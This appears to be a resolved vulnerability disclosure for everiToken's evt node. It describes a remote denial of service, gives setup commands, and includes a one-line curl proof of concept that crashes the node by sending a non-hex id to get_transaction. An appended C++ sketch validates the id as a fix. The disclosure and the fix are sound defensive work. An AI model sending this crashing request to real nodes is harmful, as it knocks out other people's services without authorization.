
DoS via get_transaction function

Creation date October 1, 2018

State: resolved
Severity: High (7.5)
Visibility: visible
Vulnerability: DoS

everiToken’s node crashes when a non-hex id value is passed to the get_transaction function. Because this API function is accessible remotely without any authorization, any evt node can be DoSed remotely.

Start the everiToken node:

  • docker run --name evtd -p 8888:8888 -p 9876:9876 -t everitoken/evt evtd.sh --http-validate-host=false --charge-free-mode

Test the node by simply requesting its version info:

  • curl localhost:8888/v1/chain/get_info

Response:

{"server_version":"b2674828","chain_id":"dae43118cc62801c4148c4143865be5bde49561fc61671516fc9183cdec91337", "evt_api_version":"3.1.2","head_block_num":1,"last_irreversible_block_num":0,"last_irreversible_block_id": "0000000000000000000000000000000000000000000000000000000000000000", "head_block_id":"000000019034e61532475fe9e396442127692fb3ddad3f971714213d5c0b2742","head_block_time":"2018-05-31T12:00:00","head_block_producer":"","recent_slots":"","participation_rate":0.00000000000000000}

To break the node, run:

curl -X POST --data '{"block_num": 12345, "id":"1" }' localhost:8888/v1/chain/get_transaction

The node crashes with the following error:

minicore-dumping failed

See PoC video attached
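The class of fix this report calls for is strict validation of the id field before it is decoded. The sketch below is an added example, not everiToken's code or its actual patch. It assumes a transaction id is a 32-byte digest written as 64 hex characters, like the block ids in the get_info output above. The names parse_tx_id and get_transaction_status are hypothetical.

```cpp
#include <array>
#include <cstddef>
#include <cstdint>
#include <string>

// Assumption: a transaction id is 32 bytes, i.e. 64 hex characters.
constexpr std::size_t kTxIdBytes = 32;
using TxId = std::array<std::uint8_t, kTxIdBytes>;

// Returns 0-15 for a hex digit, -1 otherwise. No locale use, no exceptions.
static int hex_nibble(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

// Hypothetical helper: decode the "id" field of a get_transaction request.
// Returns false (leaving `out` untouched) on a wrong length or any non-hex
// character, so a malformed id is rejected before any decoding logic that
// might throw or abort is reached.
bool parse_tx_id(const std::string& text, TxId& out) {
    if (text.size() != kTxIdBytes * 2) return false;
    TxId tmp{};
    for (std::size_t i = 0; i < kTxIdBytes; ++i) {
        const int hi = hex_nibble(text[2 * i]);
        const int lo = hex_nibble(text[2 * i + 1]);
        if (hi < 0 || lo < 0) return false;
        tmp[i] = static_cast<std::uint8_t>((hi << 4) | lo);
    }
    out = tmp;
    return true;
}

// Hypothetical handler wrapper: a bad id becomes an HTTP 400 for that one
// request instead of an unhandled failure that takes the whole node down.
int get_transaction_status(const std::string& id_field) {
    TxId id;
    return parse_tx_id(id_field, id) ? 200 : 400;
}
```

With this check in front of the handler, the request body from the report (id "1") is answered with a 400 and the process keeps running.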